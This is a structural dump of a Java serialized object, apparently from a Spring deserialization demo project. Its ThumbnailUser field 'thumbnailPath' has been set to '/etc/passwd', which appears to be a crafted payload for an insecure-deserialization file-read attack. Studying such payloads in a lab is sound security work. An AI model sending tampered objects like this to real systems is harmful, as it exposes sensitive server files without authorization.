
STREAM_MAGIC - 0xac ed
STREAM_VERSION - 0x00 05
Contents
  TC_OBJECT - 0x73
    TC_CLASSDESC - 0x72
      className
        Length - 74 - 0x00 4a
        Value - com.example.deserialization.springdeserializationdemo.Models.ThumbnailUser - 0x636f6d2e6578616d706c652e646573657269616c697a6174696f6e2e737072696e67646573657269616c697a6174696f6e64656d6f2e4d6f64656c732e5468756d626e61696c55736572
      serialVersionUID - 0x00 82 d8 ca 8e 55 3e 6c
      newHandle 0x00 7e 00 00
      classDescFlags - 0x02 - SC_SERIALIZABLE
      fieldCount - 1 - 0x00 01
      Fields
        0:
          Object - L - 0x4c
          fieldName
            Length - 13 - 0x00 0d
            Value - thumbnailPath - 0x7468756d626e61696c50617468
          className1
            TC_STRING - 0x74
              newHandle 0x00 7e 00 01
              Length - 18 - 0x00 12
              Value - Ljava/lang/String; - 0x4c6a6176612f6c616e672f537472696e673b
      classAnnotations
        TC_ENDBLOCKDATA - 0x78
      superClassDesc
        TC_CLASSDESC - 0x72
          className
            Length - 65 - 0x00 41
            Value - com.example.deserialization.springdeserializationdemo.Models.User - 0x636f6d2e6578616d706c652e646573657269616c697a6174696f6e2e737072696e67646573657269616c697a6174696f6e64656d6f2e4d6f64656c732e55736572
          serialVersionUID - 0xae 60 5c 1a 14 b5 24 ed
          newHandle 0x00 7e 00 02
          classDescFlags - 0x02 - SC_SERIALIZABLE
          fieldCount - 1 - 0x00 01
          Fields
            0:
              Object - L - 0x4c
              fieldName
                Length - 8 - 0x00 08
                Value - username - 0x757365726e616d65
              className1
                TC_REFERENCE - 0x71
                  Handle - 8257537 - 0x00 7e 00 01
          classAnnotations
            TC_ENDBLOCKDATA - 0x78
          superClassDesc
            TC_NULL - 0x70
    newHandle 0x00 7e 00 03
    classdata
      com.example.deserialization.springdeserializationdemo.Models.User
        values
          username
            (object)
              TC_STRING - 0x74
                newHandle 0x00 7e 00 04
                Length - 5 - 0x00 05
                Value - Peter - 0x5065746572
      com.example.deserialization.springdeserializationdemo.Models.ThumbnailUser
        values
          thumbnailPath
            (object)
              TC_STRING - 0x74
                newHandle 0x00 7e 00 05
                Length - 11 - 0x00 0b
                Value - /etc/passwd - 0x2F6574632F706173737764
